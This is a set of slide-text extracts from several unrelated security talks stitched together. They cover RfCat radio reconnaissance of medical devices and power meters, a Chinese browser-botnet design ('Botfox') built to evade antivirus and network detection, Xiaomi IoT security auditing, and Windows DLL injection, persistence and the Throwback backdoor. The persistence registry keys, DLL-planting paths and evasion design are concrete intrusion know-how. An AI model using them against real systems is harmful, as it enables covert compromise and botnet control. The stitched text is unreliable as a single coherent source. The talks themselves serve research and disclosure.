– (digital FM)
– cordless phones (DECT/CT2)
● ASK/OOK – Amplitude Shift Key
– (digital AM)
– morse-code, car-remotes, etc...
● MSK – Minimal Shift Key (a type of quadrature shift
modulation like QPSK)
– GSM
● MDMCFG2, DEVIATN
`
0x3030 – intermediate frequency
●
mix the RF and LO frequencies to create an IF (heterodyne)
– improves signal selectivity
– tune different frequencies to an IF that can be manipulated easily
– cheaper/simpler components
●
cc1111 supports a wide range of 31 different IF options:
– 23437 hz apart, from 0 – 726.5 khz
●
Smart RF Studio recommends:
– 140 khz up to 38.4 kbaud
– 187.5 khz at 38.4 kbaud
– 281 khz at 250 kbaud
– 351.5khz at 500 kbaud
●
FSCTRL1
0x3040 – data rate (baud)
● much like your modems or old
● the frequency of bits
– some can overlap and get garbage!
● garbage can be good...
● baud has significant impact on IF, Deviation and
Channel BW
● seeing use of 2400, 19200, 38400, 250000
● MDMCFG3 / 4
0x3050 – channel width / spacing
● simplifying frequency hopping / channelized systems
● real freq = base freq + (CHANNR * width)
● MDMCFG0 / 1
0x3060 – bandwidth filter
● programmable receive filter
● provides for flexible channel sizing/spacing
● total signal bw = signal bandwidth + (2*variance)
● total signal bw wants to be less than 80% bw filter!
● MDMCFG4
0x3070 – preamble / sync words
● identify when real messages are being received!
● starts out with a preamble (1 0 1 0 1 0 1 0...)
● then a sync word (programmable bytes)
– marking the end of the preamble
– aka 'SFD' – start of frame delimiter
● configurable to:
– nothing (just dump received crap)
– carrier detect (if the RSSI value indicates a message)
– 15 or 16 bits of the SYNC WORD identified
– 30 out of 32 bits of double-SYNC WORD
● SYNC1, SYNC0, MDMCFG2
0x3080 – variable / fixedlength packets
● packets can be fixed length or variable length
● variable length assumes first byte is the length byte
● both modes use the PKTLEN register:
– Fixed: the length
– Variable: MAX length
● PKTCTRL0, PKTLEN
0x3090 – CRC – duh, but not
●
crc16 check on both TX and RX
●
uses the internal CRC (part of the RNG) seeded by 0xffff
●
DATA_ERROR flag triggers when CRC is enabled and fails
●
some systems do this in firmware instead
● PKTCTRL0
0x30a0 – data whitening – 9 bits of pain
● ideal radio data looks like random data
● real world data can contain long sequences of 0 or 1
● data to be transmitted is first XOR'd with a 9-bit sequence
– sequence repeated as many times as necessary to
match the data
● PKTCTRL0
0x30b0 – encoding
● manchester
– MDMCFG2
● forward error correction
– convolutional
● MDMCFG1
– reed-solomon (not supported)
● encryption - AES in chip
0x30c0 – example: MDMCFG2 register
sorry, couldn't resist
0x3100 – how can we figure it out!?
● open / public documentation
– insulin pump published frequency
● open source implementation / source code
● “public” but harder to find (google fail!)
– fcc.gov – search for first part of FCC ID
● http://transition.fcc.gov/oet/ea/fccid/ -bookmark it
– patents – amazing what people will patent!
● http://freepatentsonline.com
● french patent describing the whole MAC/PHY of one meter
● and another:
http://www.freepatentsonline.com/8189577.html
http://www.freepatentsonline.com/20090168846.pdf
0x3101 – how can we figure it out!? part2
● reversing hw
– tapping bus lines – logic analyzer
● grab config data
● grab tx/rx data
– pulling and analyzing firmware
● hopping pattern analysis
– arrays of dongles – space them out and record results
– hedyattack, or something similar
– spectrum analyzer
– USRP2 or latest gadget from Michael Ossman
● trial and error – rf parameters
● MAC layer? - takes true reversing.. unless you find a patent :)
0x4000 – intro 2 FHSS – SPDY!
● FHSS is common for devices in the ISM bands
– provides natural protection against unintentional
jamming /interferance
– US Title 47 CFR 15.247 affords special power
considerations to FHSS devices
● >25khz between channels
● pseudorandom pattern
● each channel used equally (avg) by each transmitter
● if 20db of hopping channel < 250khz:
– must have at least 50 channels
– average <0.4sec per 20 seconds on one channel
● if 20dB of hopping channel >250khz:
– must have at least 25 channels
– average <0.4sec per 10 seconds on one channel
0x4010 – FHSS, the one and only NOT!
●
different technologies:
–
DSSS – Direct Sequence Spread Spectrum
● hops happen more often than bytes (ugh)
● typically requires special PHY layer
–
“FHSS”
● hops occur after a few symbols are transmitted
●
different topologies: (allow for different synch methods)
–
point-to-point (only two endpoints)
–
multiple access systems (couple different options)
● each cell has their own hopping pattern
● each node has own hopping pattern
●
different customers:
–
military has used frequency hopping since Hedy and George submitted the
patent in 1941.
–
commercial folks (WiFi, Bluetooth, proprietary stuff like power meters)
0x4020 – FHSS intricacies
● what's so hard about FHSS?
– must know or be able to come up with the hopping pattern
● can be anywhere from 50 to a million distinct channel hops
before the pattern repeats (or more)
– must be able to synchronize with an existing cell or partner
● or become your own master!
– must know channel spacing
– must know channel dwell time (time to sit on each channel)
– likely need to reverse engineer your target
– DSSS requires that you have special hardware
●
military application will be very hard to crack, as it typically will have hops
based on a synchronized PRNG to select channels
0x4030 – FHSS, the saving graces
● any adhoc FHSS multi-node network: (power meters / sensor-nets)
– node sync in a reasonable timeframe
● limited channels in the repeated pattern
– each node knows how to talk to a cell
● let one figure it out, then tap the SPI bus to see what the
pattern is...
● two keys to determining hopping pattern:
– hop pattern generation algorithm
● often based on the CELL ID
– one pattern gets you the whole cell :)
● others generate a unique pattern per node
– some sync information the cell gives away for free
● gotta tell the n00bs how to sync up, right?
● for single-pass repeating sequences, it's just the channel
0x4040 – FHSS summary
● FHSS comes in different forms for different uses and
different users
● FHSS is naturally tolerant to interference, and allows a
device to transmit higher power than nonFHSS comms
● getting the FHSS pattern, timing, and appropriate sync
method for proprietary comms can be a reversing
challenge
● getting a NIC to do something with the knowledge
gained above has – to date – been very difficult
0x5000 – intro to RfCat
● RfCat: RF Chipcon-based Attack Toolset
● RfCat is many things, but I like to think of it as an interactive
python access to the <GHz spectrum!
0x5010 – rfcat background
● the power grid
– power meters and the folks who love them (yo cutaway,
q, travis and josh!)
– no availability of good attack tools for RF
● vendor at Distributech 2008:
“Our Frequency Hopping Spread Spectrum is too fast
for hackers to attack.”
● OMFW! really?
0x5020 – rfcat goals
● RE tools - “how does this work?”
● security analysis tools - “your FHSS and Crypto is weak!”
● satiate my general love of RF
● a little of Nevil Maskelyne
● “I will not demonstrate to any man who throws doubt upon the
system” - Guglielmo Marconi, 1903
– lulwut?
0x5030 – rfcat's interface
● rfcat
– FHSS-capable NIC
● some assembly may be required for FHSS to arbitrary devices
– toolset for discovering/interfacing with RF devices
● rfcat_server
– access the <GHz band over an IP network or locally and
configure on the fly
– connect to tcp port 1900 for raw data channel
– connect also to tcp port 1899 for configuration
0x5040 – rfcat
● customizable NIC-access to the ISM bands
● ipython for best enjoyment
● lame spoiler: you get a global object called “d” to talk to the
dongle
– d.RFxmit('blah')
– data = d.RFrecv()
– d.discover(lowball=1)
– d.RFlisten()
– help(d)
0x5050 – rfcat_server
● bringing <GHz over the IP network!
● connect on TCP port 1900 to access the wireless network
● connect on TCP port 1899 to access the wireless configuration
● created to allow non-python clients to play too
– stdin is not always the way you want to interact with
embedded wireless protocols
0x5060 – rfsniff (pink version too!)
● focused primarily on capturing data from the wireless network
● IMME used to provide a nice simple interface
● RF config adjustment using keyboard!
0x5065 – rfsniff – key bindings
0x5070 – rfcat wicked coolness – WORKPIX
● d._debug = 1 – dump debug messages as things happen
● d.debug() - print state infoz once a second
● d.discover() - listen for specific SYNCWORDS
● d.lowball() - disable most “filters” to see more packets
● d.lowballRestore() - restore the config before calling lowball()
● d.RFlisten() - simply dump data to screen
● d.RFcapture() - dump data to screen, return list of packets
● d.scan() - scan a configurable frequency range for “stuff”
● print d.reprRadioConfig() - print pretty config infoz
●
d.setMdm*() d.setPkt*() d.make*()
0x5100 – example lab setup
● example RF attack lab setup:
– dongle “Gina” running hedyattack spec-an code
– dongle “Paul” running rfcat
– IMME running rfsniff
– (possibly an IMME's running SpecAn)
– saleae logic analyzer for hacking of the wired variety
– FunCube Dongle and quisk/qthid or other SDR
rf attack form
●
base freq:
●
modulation:
●
baud/bandwidth:
●
deviation:
●
channel hopping?
–
how many channels:
channel spacing:
–
pattern and effective sync method?
dwell period (ms):
●
fixed-/variable-length packets:
len/maxlen:
●
“address”:
●
sync word (if applicable):
●
crc16 (y/n):
does chip do correct style?
●
fec (y/n):
type (convolutional/reed-soloman/other):
●
manchester encoding (y/n):
●
data whitening? and 9bit pattern:
●
more complete information:
http://atlas.r4780y.com/resources/rf-recon-form.pdf
0x6000 – playing with medical devices
● CAUTION: MUCKING WITH THESE CAN KILL PEOPLE.
– THIS FIRMWARE AND CLIENT NOT PROVIDED
● found frequency in the pdf manual from the Internet
– what random diabetic cares what frequency his pump
communicates with!? ok, who cares!
● modulation guessed based on spectrum analysis and trial/error
– the wave form just looks like <blah> modulation!
● other characteristics discovered using a USRP and baudline
(and some custom tools, thanks Mike Ossman!)
0x6010 – the discovery process
● glucometer was first captured using Spectrum Analyzer
(IMME/hedyattack) to validate frequency range from the lay-
documentation
● next a logic analyzer (saleae) used to tap debugging lines
● next, the transmission was captured using a USRP (thank you
Mike Ossman for sending me your spare!) - alt: FunCube
● next, the “packet capture” was loaded into Baudline, and
analysis performed to identify baudrate and modulation
scheme, and get an idea of bits
● next, Mike Ossman did amazing-sauce, running
the capture through GnuRadio Companion
(the big picture on next slide)
● RF parameters confirmed through RF analysis,
and real-life capture.
0x6011 – discovery reloaded
0x6020 –the immaculate reception
●
punched in the RF parameters into a RFCAT dongle
– created subclass of RFNIC (in python) for new RF config
●
dropped into “discover” mode to ensure I had the modem right
●
●
●
●
●
●
returned to normal NIC mode to receive real packets
●
now need the pump to reverse the bi-dir protocol
0x6100 – playing with a power meter
● CAUTION: MUCKING WITH POWER SYSTEMS WITHOUT APPROPRIATE
AUTHORIZATION IS ILLEGAL, EVEN IF IT IS ON THE SIDE OF YOUR HOUSE!
●
most power meters use their own proprietary “Neighborhood Area Network”
(NAN), typically in the 900MHz range and sometimes 2.4GHz or licensed
spectrum.
●
to get the best reception over distance and gain tolerance to interference, all
implement FHSS to take advantage of the Title 47: Part 15 power
allowances
●
many of the existing meters use the same cc1111 or cc1110 chips, or the
cc1101 radio core
●
this is the reason I'm here today
0x6110 – as sands through the hourglass
● power meter RF comms have long been “unavailable” for
most security researchers
● some vendors understand the benefits of security
rigor by outside researchers
– others, however, do not.
● the gear used in my presentation was given to me by one
who understands
– for various reasons, they have asked to remain
anonymous, however, their security team has a
well founded approach to finding out “how their
baby is ugly” I would like to give them credit for
their commitment to the improved security of their
products.
atlas, tell us what you really think
0x6120 – smart meter – the complication
●
power meters are not so simple as glucometers
– proprietary FHSS in a multiple-access topology
– have to endure the RF abuse of the large metropolis
●
complex mac sync/net-registration
●
not easy to show with a single meter without a Master node.
●
initial analysis was performed via my saleae LA:
●
SpecAn code on IMME's and hedyattack dongles
– good for identifying periods of scanning
●
although the dongle can hop along with the meter, we won't be
demoing synching with the meter today
0x6130 – the approach
●
determine the rf config and hopping pattern through SPI Bus sniffing
(and my saleae again)
●
●
0x6135 – Logic Analyzer
● decoding:
● custom parser for the
target radio--->>>
0x6140 – the approach (2)
● discover mode:
– disables sync-word so radio sends unaligned bits
– algorithm looks for preamble (0xaa or 0x55)
– then determines possible dwords
● ummm... but that's not any bit-derivation of the sync word(s) I
expect. wut? I am confident those are coming from the meter
– intro: Bit Inversion (see highlighted hex)
0x6145 – new developments
● vendors have filed numerous patents with hopping
pattern calculations, comms parameters, etc...
– WIN!
– plenty of work to be done! jump right in!
● http://www.patentstorm.us/patents/7064679/fulltext.html
● http://www.patentstorm.us/patents/7962101/fulltext.html
● http://www.patentstorm.us/applications/20080204272/fulltext.html
● http://www.patentstorm.us/applications/20080238716/fulltext.html
“Abuse is no argument”
- Nevil Maskelyne
0x6150 conclusions
● rfcat discover mode roxors
● rfcat is a foundation for your attack tool
– way more than just a tool in itself
● we are responsible for ensuring our devices use
appropriate security. do not simply expect someone
else to do it. the first med-device death could be your
best friend.
References
●
http://rfcat.googlecode.com
●
http://en.wikipedia.org/wiki/Part_15_(FCC_rules)
●
http://en.wikipedia.org/wiki/ISM_band
●
http://www.ti.com/lit/ds/swrs033g/swrs033g.pdf - “the” manual
●
http://edge.rit.edu/content/P11207/public/CC1111_USB_HW_User_s_Guide.pdf
●
http://www.ti.com/litv/pdf/swru082b
●
http://www.ti.com/product/cc1111f32#technicaldocuments
●
http://www.ti.com/lit/an/swra077/swra077.pdf
●
http://www.newscientist.com/article/mg21228440.700-dotdashdiss-the-gentleman-hackers-1903-lulz.html
●
http://saleae.com/
●
http://zone.ni.com/devzone/cda/epd/p/id/5150 - FSK details (worthwhile!)
●
http://www.radagast.org/~dplatt/hamradio/FARS_presentation_on_modulation.pdf
–
very good detailed discussion on deviation/modulation
●
http://en.wikipedia.org/wiki/Frequency_modulation
●
http://en.wikipedia.org/wiki/Minimum-shift_keying
0xgreetz
● power hardware folk who play nice with security researchers
● cutaway and q (awesome hedyattackers)
● gerard van den bosch
● travis and mossman
● sk0d0 and the four J's
● invisigoth and kenshoto
● Jewel, bug, ringwraith, diva
● Jesus Christ | pdf |
Botfox – 基於瀏覽器與社交工程之殭屍網路研究
Botnet based on Browser and Social Engineering
動機
你知道嗎?
現行的安全防護不像你想像的那般健壯 ...
實驗證實,
『它』可以繞過目前所有常見的安全防護 ...
你相信嗎?
『它』的技術含量低到只有我用『它』 ...
你相信嗎?
『它』的建置成本很低很低 ...
你認同嗎?
大腦本身就是一種永遠可以被利用的 0day...
自我介紹
Ant
[email protected]
中研院
自由軟體授權
台灣駭客年會講師
Wow!USB 隨身碟防毒
Wow!ScanEngine 掃毒引擎
Wow!ARP 防護軟體
經濟學
混沌
複雜
程式設計師
系統管理師
資訊安全實習生
自由軟體鑄造場
FreeBSD 官方中文文件維護者
主題
來到
Web 2.0 的時代
歡迎
[email protected]
http://www.flickr.com/photos/hawaii/2089328125/
[email protected]
http://www.flickr.com/photos/pablolarah/3549205887/
[email protected]
http://www.flickr.com/photos/libraryman/2528892623/
[email protected]
http://www.flickr.com/photos/daysies/2554510463/
來到
Cloud 的時代
歡迎
[email protected]
http://www.flickr.com/photos/mediaeater/3476903211/
[email protected]
http://www.flickr.com/photos/jaxmac/193001859/
Power . Robust . Convenience
當一切都變得不再單純 ...
來到
Web 2.0 的時代
歡迎
Bot 2.0 的時代
(aka. CloudBot)
Bot 1.0
Attacker
C&C Server
Zombies
Victims
Bot 2.0
(aka CloudBot)
Attacker
Tor
Legitimate Server
Bot 1.0
Bot 2.0
Botnet 的定義
指由 Malware 操控平台所成形成的一種 Command and Control (C&C)
Topology 。透過 Botnet 架構讓 Hacker 能夠大量且自動化地操控 Bot 。
來源 :
Jeremy Chiu (aka Birdman)
Workshop on Understanding Botnets of Taiwan 2009
第一屆台灣區 Botnet 偵測與防治技術研討會
殭屍網路的
演化史
Photo:
[email protected]
http://www.flickr.com/photos/12426416@N00/490888951
演化趨勢
推斷未來模式
以 Protocol 分群
Protocol
1. IRC
2. HTTP
3. P2P
4. Instant Messenger (MSN etc.)
5. Own communication
Botnet Trends Analysis
Photo:
[email protected]
http://www.flickr.com/photos/wileeam/2410989725/
Botnet Trends Analysis
1. 高隱匿、難追蹤
2. 利用社交工程
3. 開始注意嵌入式設備
4. 以感染的數量換取其它的優勢
Photo:
[email protected]
http://www.flickr.com/photos/wileeam/2410989725/
http://dronebl.org/blog/8
Router Botnet
http://dronebl.org/blog/8
•* called 'psyb0t'
•* maybe first botnet worm to target routers and DSL modems
•* contain shellcode for many mipsel devices
•* not targeting PCs and Servers
•* user multiple strategies for exploitation, such as bruteforce user/pass
•* harvests usernames and passwords through deep packet inspection
•* can scan for exploitable phpMyAdmin and MySQL servers
回到主題
Botfox – 基於瀏覽器與社交工程之殭屍網路研究
Botnet based on Browser and Social Engineering
提出一個對於未來演化的可能
以及早對未來作出因應對策
Botfox *Research*
1. 基於瀏覽器
2. 基於社交工程
3. 基於純 JavaScript 語言
4. 基於 Web 2.0/Cloud
Photo:
Sparrow*@flickr.com
http://www.flickr.com/photos/90075529@N00/140896634
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
基於社交工程
1. 人性是資訊安全最弱的一環
2. 修補大腦比修補軟體漏洞來得難
3. 即使訓練有素,仍難敵好奇心驅使
基於純 JavaScript
1. 網頁標準語言之一
2. 跨瀏覽器的特性
3. 防毒軟體難以分析其惡意程式
4. 不需額外開啟通訊埠 (port)
基於 Web 2.0/Cloud
1. 運用 Web 2.0 的發文機制
2. 使用 Cloud 的效能與穩定性
3. 低成本開發,不需設計 Protocol 與建置 C&C
4. 基於合法網站為掩護
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
如釣魚般等待上餌
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
利用受害者的名義及社交網路散佈 ( 如 Email)
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
因有別於其它 SPAM 方式,使得釣魚成功率提高
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
在合法網站上的 C&C 分散佈置 ( 如 Blog,Twitter,Plurk)
Attacker
Tor
Legitimate Server
Msg
Msg
對 ant.openfoundry.org 進行 DDoS 攻擊
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Bots 不定時向 C&C 收取訊息
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
DEMO
Botnet Detection
Photo:
[email protected]
http://www.flickr.com/photos/andreasnilsson1976/2093950981/
AntiVirus
1. JavaScript 的特性,使得在判斷上有許多困難。
2. 無任何 API Hooks 。
3. 無任何 Registry 。
4. 無任何 DLL 。
T 牌、 K 牌、 S 牌、 A 牌、 N 牌 ... 等,
全數通過 VirusTotal 的廠商。
Rootkit Detection
1. JavaScript 的特性,使得在判斷上有許多困難。
2. 無任何 API Hooks 。
3. 無任何 Registry 。
4. 無任何 DLL 。
RootkitRevealer 、 RkHunter 、 GMER 、 Panda Anti-Rootkit 、 Sophos Anti-Rootkit 、
Rootkit Hook Analyzer 、 IceSword 、 Avira Rootkit Detection 、 Rootkit UnHooker 、
AVG Anti-Rootkit 、 McAfee Rootkit Detective 、 DarkSpy 、 F-Secure BlackLight 。
Process Explorer
1. 基於瀏覽器。
2. 不需額外的 Process 。
3. 無任何 DLL 。
Process Explorer 、 Process Monitor 、 Combofix 、 Hijackthis 、 SREng 、 EFIX 、
Runscanner 、 Autoruns 。
Network Monitor
1. 基於瀏覽器,不需開啟 Port 。
2. 使用 HTTP/HTTPs 。
3. 使用正常 DNS 。
4. 封包 / 字串無任何惡意內容。
TCPView 、 WireShark 、 Nmap 。
Honeypots
1. 被動式 Honeypot → 使用社交工程手法。
2. 主動式 Honeypot → Bots 間不溝通,避免被名單搜集。
3. C&C 使用正常網站,難以區別正常、異常瀏覽。
4. 封包 / 字串無任何惡意內容。
Capture-HPC 、 Tinyhoneypot 、 Capture BAT 、 Google Hack Honeypot 、
Honeyd 、 Honeytrap 、 Honeywall 、 Honeyclient 。
正 必須成為 Botnets 的一員
Bot 彼此間不直接溝通
邪 C&C 網站難以區別正常、異常瀏覽
Log analysis / Log correlation
Detecting Botnets Through Log Correlation (2006)
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotFox
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotTracer
BotTracer: Execution-based Bot-like Malware Detection (2008)
BotTracer
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotFox
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotSniffer
BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic (2008)
BotSniffer
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotFox
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
Behavior/Log Analysis
1. 基於瀏覽器,非常容易模擬正常行為。
2. 瀏覽器常為白名單的一員。
3. 使用 HTTP/HTTPs ,封包 / 字串無任何惡意內容。
4. 使用正常 DNS 。
BotSniffer 、 BotTracer 、 Log Analyzer 。
Detecting DDNS Bots
Assumption:
1. For DDNS, botnets tend use subdomains; legitimate directories use subdirectories
2. Use SLD/3LD-ratios to identify botnet traffic
Botnet Detection and Response: The Network is the Infection (2005)
Detecting DDNS Bots
Assumption:
1. For DDNS, botnets tend use subdomains; legitimate directories use subdirectories
2. Use SLD/3LD-ratios to identify botnet traffic
Monitoring Group Activities
Differences between Botnet and Legitimate DNS
Botnet Detection by Monitoring Group Activities in DNS Traffic (2007)
Monitoring Group Activities
Differences between Botnet and Legitimate DNS
Anomaly Detection to DNS Traffic
Assumption: Bots typically employ DDNS
Methods:
1. High DDNS query rates may be expected because
botmasters frequently move C&C servers.
2. looking for abnormally recurring DDNS (NXDOMAIN).
Such queries may correspond to bots trying to locate
C&C servers that have been taken down.
Identifying Botnets Using Anomaly Detection Techniques Applied to DNS Traffic (2008)
Anomaly Detection to DNS Traffic
Assumption: Bots typically employ DDNS
Methods:
1. High DDNS query rates may be expected because
botmasters frequently move C&C servers.
2. looking for abnormally recurring DDNS (NXDOMAIN).
Such queries may correspond to bots trying to locate
C&C servers that have been taken down.
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotFox
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
Cooperative behavior
A proposal of metrics for botnet detection based on its cooperative behavior (2007)
Cooperative behavior
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
BotFox
基於瀏覽器
1. 非常容易模擬正常行為 ( 基於 Port 80, 443 的實現 )
2. 跨平台特性 ( 手持式裝置、手機等 )
3. 最常使用的應用程式之一
4. 白名單的常客
5. 完全使用正常的 DNS 查詢
DNS Traffic
1. 基於瀏覽器,非常容易模擬正常行為。
2. 使用正常 DNS 。
Spam Signatures
Spamming Botnets: Signatures and Characteristics (2008)
Spam Signatures
SPAM Signatures
1. 使用受害者的線上郵遞系統 → 正當來源, SPAM 特徵低。
2. 使用多個線上郵遞系統,如 Gmail 、 Yahoo → 降低同源特徵。
3. 還有很多方法可以避開 SPAM 特徵。
IRC Analysis
1. 不使用 IRC protocol 。
2. 很多網路環境禁用 IRC protocol 。
3. 許多安全工具視 IRC 封包為可疑 / 惡意封包。
P2P Analysis
1. 不使用 P2P protocol 。
2. 不需與 P2P-filter 攻防戰。
3. 不需額外開 Port ,降低被偵測的機率。
4. 可運行於僅允許 HTTP/HTTPs 的網路環境。
Open Proxy
1. 不使用 Open Proxy 。
2. 不需額外開 Port ,降低被偵測的機率。
VPN
1. 通常 VPN 會允許 HTTP/HTTPs 。
Content Filter
1. 封包 / 字串無任何惡意內容 → 防止關鍵字偵測。
2. 使用正常 DNS → 防止 DNS 黑名單。
3. JavaScript 的特性使的關鍵特徵難以擷取。
Google Chrome
©Google
Opera
©Opera software
Microsoft IE
©Microsoft
更甚者
地理定位技術
Geolocation
©Google
©Opera software
©Mozilla
©Microsoft
©Apple
結論
1. 歡迎來到 Bot 2.0 (aka CloudBot) 的時代。
2. 『它』可以繞過目前所有常見的安全防護。
3. 技術量低、成本低。
4. 大腦本身就是一種永遠可以被利用的 0day ( 社交工程手法 ) 。
5. 雲端運算的時代,也意謂著
更強大、更穩健、隨開即用之跨平台惡意程式時代的來臨。
Ant
[email protected] | pdf |
IoT 自动化安全平台体系建设
我是谁?从哪里来?要做什么?
l 我叫孟卓,ID:FengGou
l 来自小米 AIoT 安全实验室
l 保障米系智能产品的安全,赋能业务
团队任务如何达成?
l 消:消除隐患
l 防:防患于未燃
l 员:人员的成长
消除隐患
技术栈复杂
技术难
人才缺失
团队难
产品量激增
压力大
行业经验
无体系
面临严峻挑战
初步尝试
AIoT 消费级物联网产品安全基线
团队能力交叉
误入歧途 - 实验室变流水线工厂
二向箔
IoT自动化审计
的突破
业务构成 -- 抽丝剥茧
芯片
应用
模块
IPC
通信
用户
APP
IoT
智能联动
I2X
二维化
芯片接口
以太流量
无线流量
设备服务
控制协议
固件分析
源码分析
日志行为
接口Fuzz
APP Hook
云服务
攻击链组合
局域网
互联网
本地环回
无认证
弱认证
强认证
认证泄漏
认证绕过
认证劫持
RCE
信息泄露
拒绝服务
TARGET : MQTT
RESULT : HIGH
* 数据分析攻击链路分布
全天候自动化闭环
发现
方案
复查
关闭
学习
修完漏洞就安全了?
这是一个巨大的误区,安全是动态的。随
着技术的迭代,品类的多样化,开发者的
交替、供应的风险以及用户要求的提升,
很难找到一个「基点」来说明产品的安全。
赋能生态
小米
生态
链
三方
业务
合作
防患于未燃
产品构成
○
硬件/芯片
○
传感模块
○
操作系统
○
依赖库/开源代码
○
链路协议栈
不可控
○
应用协议栈/SDK
○
服务代码/APP
○
云服务
○
账号体系
可控
小米战场
AIoT
车联网 / 自动驾驶
机器人 / 工业控制
手机 / 电视 / 笔记本
人无远虑,
必有近忧。
——《论语》 | pdf |
Ge#ng&Windows&to&Play&with&Itself5
A"Hacker’s"Guide"to"Windows"API"Abuse"
"
Brady"Bloxham"
Founder/Principal"Security"Consultant"
@silentbreaksec"
hCp://www.silentbreaksecurity.com"
hCp://www.blacksquirrel.io""
Background5
• Shorten"the"gap"between"
penetraHon"test"and"actual"aCack"
• Few"covert"persistence"tools"
• Reduce"reliance"on"Metasploit"
Got&a&lot&to&cover5
• DLL"InjecHon"
• Persistence"
• Throwback"
• Lots"of"demos"along"the"way"
DLL&Injec?on5
• TradiHonal"methods"
• CreateRemoteThread()"
• NtCreateThreadEx()"
• RtlCreateUserThread()"
• NtQueueApcThread"()"
• Can"blue"screen"certain"OSes"
• Code"Cave"
• Suspend"process"
• Inject"code"
• Change"EIP"to"locaHon"of"injected"code"
• Resume"process"
• Difficult"on"x64"
AddMonitor()5
• +"
• Injects"into"spoolsv.exe"
• Doesn’t"require"matching""
architecture"
• Easy"to"use"
• \"
• Dll"must"be"on"disk"
• Requires"administrator"privs"
Dll&Injec?on&Demo5
Persistence5
• Lots"of"persistence"in"Windows"
• Service""
• Run"keys"
• Schtasks"
• …"
• And"lots"sHll"to"find…"
• Lots"of"techniques"
• Process"monitor"
• Hook"LoadLibrary()"
Persistence5
• 1st"Technique"
• Requires"VMware"Tools"be"installed"
• Just"drop"a"dll"to"disk"
• c:\windows\system32\wbem\ntdsapi.dll"
• Note:"Dll"must"export"same"funcHons"as""
real"ntdsapi.dll"
• 2nd"Technique"
• VMware"patched"in"ESXi"5.5"
• Requires"VMware"Tools"be"installed""
• Just"drop"a"dll"to"disk"
• c:\windows\system32\wbem\tpgenlic.dll"
• c:\windows\system32\wbem\thinmon.dll"
Windows(
Persistence5
• 3rd"Technique"
• HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\"
• Create"a"new"key""
• Create"a"new"value"named"Driver"with"the"dll"name"
• Create"as"many"as"you"like"
Persistence&Demo5
Windows&API&HTTP&Cheatsheet5
• WinHTTP"
• Intended"for"services"
• Does"not"pull"user"proxy"seings"
• Supports"impersonaHon"
• WinINet"
• More"robust"in"proxy"environment""
• Variety"of"flags"that"enable/disable"funcHonality"automaHcally"
• Prompts"user"for"password"if"authenHcaHon"is"required"
• Uses"IE"seings"
What&is&Throwback?5
• C++"HTTP/S"beaconing"backdoor"
• PHP"control"panel"w/"MySQL"backend"
• Built"for"stealth"
• Persistence"built\in"
• Dll""
• Exe"
Infected(User (
Proxy(/(Firewall
ThrowbackLP
Attacker
ThrowbackLP
Throwback&Features5
• Robust"proxy"detecHon"
• Distributed"LPs""
• Uses"MSGRPC"to"generate"MSF"payloads"
• RC4"encrypted"comms""
• Implements"reflecHve"dll"injecHon"
• String"encrypHon"
Throwback5
Throwback&Demo5
Going&Forward…5
• Community"based"project!!!"
• Create"modules"
• Keylogger,"Mimikatz,"Hashdump,"etc."
• Various"transport"methods"
• AddiHonal"persistence"techniques"
• ModificaHon"of"comms"
The&End&Shameless&Plug5
• Interested"in"wriHng"custom"malware/backdoors?"
• Dark"Side"Ops:"Custom"PenetraHon"TesHng"
• Blackhat"Europe"and"East"Coast"Trainings"
• Pen"test"networks"from"your"browser"
• hCps://www.blacksquirrel.io"
"
• Silent"Break"Security"
• Blackbox/Red"Team"Pen"TesHng"
• [email protected]"
